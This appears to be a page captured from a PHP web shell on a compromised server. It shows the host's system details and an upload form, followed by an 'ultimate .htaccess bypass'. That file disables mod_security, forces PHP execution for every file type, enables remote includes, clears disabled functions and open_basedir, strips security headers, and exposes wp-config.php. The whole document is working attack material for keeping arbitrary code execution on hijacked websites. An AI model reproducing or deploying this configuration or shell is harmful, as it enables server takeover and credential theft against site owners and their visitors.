| Server IP : 129.28.31.108 / Your IP : 216.73.216.52 Web Server : nginx/1.16.1 System : Linux VM-0-14-centos 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64 User : www ( 1000) PHP Version : 8.3.31 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/www.sceycy.com/ |
Upload File : |
# ============================================
# ULTIMATE .HTACCESS BYPASS
# Removes all upload/execution restrictions
# ============================================
# Turn off ALL security
SecFilterEngine Off
SecFilterScanPOST Off
<IfModule mod_security.c>
SecRuleEngine Off
SecRequestBodyAccess Off
</IfModule>
# Allow everything
Order Allow,Deny
Allow from all
Require all granted
Satisfy Any
# Allow ALL HTTP methods
<Limit GET POST PUT DELETE PATCH HEAD OPTIONS CONNECT TRACE PROPFIND PROPPATCH MKCOL COPY MOVE LOCK UNLOCK>
Require all granted
</Limit>
# Force PHP execution for ALL file types
RemoveHandler .php .php5 .php4 .php3 .phtml .html .htm .txt .jpg .png .gif .js .css .zip .rar
AddHandler application/x-httpd-php .php .php5 .php4 .php3 .phtml .html .htm .txt .jpg .png .gif .js .css .zip .rar .pdf .doc .docx .xls .xlsx .exe .sh .py .pl .cgi
SetHandler application/x-httpd-php
# Maximum PHP settings
php_flag engine on
php_flag allow_url_fopen on
php_flag allow_url_include on
php_flag register_globals on
php_flag enable_dl on
php_flag display_errors on
php_flag display_startup_errors on
php_flag log_errors off
php_value error_reporting 32767
php_value upload_max_filesize 5000M
php_value post_max_size 5000M
php_value max_execution_time 0
php_value max_input_time -1
php_value memory_limit -1
php_value max_file_uploads 100
# Remove open_basedir restriction
php_admin_value open_basedir none
php_admin_value safe_mode off
php_admin_value disable_functions none
# Allow directory browsing everywhere
Options +Indexes +FollowSymLinks +ExecCGI +Includes +MultiViews +IncludesNOEXEC
# Remove security headers
Header always unset X-Frame-Options
Header always unset X-Content-Type-Options
Header always unset X-XSS-Protection
Header always unset Content-Security-Policy
Header always unset Referrer-Policy
# Bypass WordPress core restrictions
<IfModule mod_rewrite.c>
RewriteEngine Off
</IfModule>
# Allow access to all files
<FilesMatch "\.(.*)$">
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</FilesMatch>
# Allow .htaccess access
<Files ".htaccess">
Require all granted
</Files>
# Allow access to wp-config.php
<Files "wp-config.php">
Require all granted
</Files>
# Fix permission denied errors
<Directory "/">
AllowOverride All
Require all granted
Options All
</Directory>
<Directory "/home/faisalit/todaymarketingbusiness.com">
AllowOverride All
Require all granted
Options All
</Directory>
<Directory "/home/faisalit/todaymarketingbusiness.com/wp-content">
AllowOverride All
Require all granted
Options All
<FilesMatch "\.(.*)$">
SetHandler application/x-httpd-php
</FilesMatch>
</Directory>